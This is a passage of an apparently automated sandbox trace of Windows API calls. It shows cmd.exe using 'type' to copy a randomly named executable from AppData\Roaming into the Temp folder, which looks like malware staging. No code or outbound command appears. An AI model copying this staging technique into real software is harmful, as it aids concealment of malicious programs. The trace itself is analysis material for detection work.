returned 8 [0111.299] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0111.300] GetEnvironmentStringsW () returned 0x3e24d8* [0111.300] FreeEnvironmentStringsW (penv=0x3e24d8) returned 1 [0111.300] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.300] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.300] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 
[0111.300] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0111.300] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0111.300] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0111.300] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0111.300] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0111.300] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0111.300] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0111.300] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.300] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f570, lpFilePart=0x26f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f56c*="Desktop") returned 0x18 [0111.300] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.300] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2ec | out: lpFindFileData=0x26f2ec) returned 0x3e0b68 [0111.300] FindClose (in: hFindFile=0x3e0b68 | out: hFindFile=0x3e0b68) returned 1 [0111.300] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2ec | out: lpFindFileData=0x26f2ec) returned 0x3e0b68 [0111.300] FindClose (in: hFindFile=0x3e0b68 | out: hFindFile=0x3e0b68) returned 1 [0111.301] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2ec | out: lpFindFileData=0x26f2ec) returned 0x3e0b68 [0111.301] FindClose (in: hFindFile=0x3e0b68 | out: hFindFile=0x3e0b68) returned 1 [0111.301] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.301] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0111.301] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0111.301] GetEnvironmentStringsW () returned 0x3e0388* [0111.301] FreeEnvironmentStringsW (penv=0x3e0388) returned 1 [0111.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.301] GetConsoleOutputCP () returned 0x1b5 [0111.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.302] GetUserDefaultLCID () returned 0x409 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6b0, cchData=128 | out: lpLCData="0") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6b0, cchData=128 | out: lpLCData="0") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f6b0, cchData=128 | out: lpLCData="1") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0111.302] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0111.302] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0111.303] GetConsoleTitleW (in: lpConsoleTitle=0x3d0a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0111.303] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0111.303] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0111.303] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0111.304] _wcsicmp (_String1="type", _String2=")") returned 75 [0111.304] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0111.304] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0111.304] _wcsicmp (_String1="IF", _String2="type") returned -11 [0111.304] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0111.304] _wcsicmp (_String1="REM", _String2="type") returned -2 [0111.304] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0111.308] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 68 [0111.308] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 68 [0111.308] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 71 [0111.308] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 71 [0111.308] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 80 [0111.308] _wcsicmp (_String1="REM/?", 
_String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 80 [0111.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.311] GetFileType (hFile=0x7) returned 0x2 [0111.346] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f544 | out: lpMode=0x26f544) returned 1 [0111.346] _dup (_FileHandle=1) returned 3 [0111.347] _close (_FileHandle=1) returned 0 [0111.347] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", _String2="con") returned -53 [0111.347] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0111.347] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0111.347] GetConsoleTitleW (in: lpConsoleTitle=0x26f344, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.348] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0111.348] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0111.348] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0111.348] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0111.348] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.349] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26eea8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eea8) returned 0x3d0f68 [0111.349] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0111.349] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") 
returned 74 [0111.349] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0111.349] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26ddb4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.349] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.349] GetFileType (hFile=0x54) returned 0x1 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.349] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26de0c | out: lpFileSizeHigh=0x26de0c*=0x0) returned 0x7d600 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.349] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.350] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.351] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.351] GetFileType (hFile=0x4c) returned 0x1 [0111.351] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.351] GetFileType (hFile=0x4c) returned 0x1 [0111.351] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.351] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 
0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.353] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) 
returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.354] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, 
lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.355] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType 
(hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.356] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.356] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, 
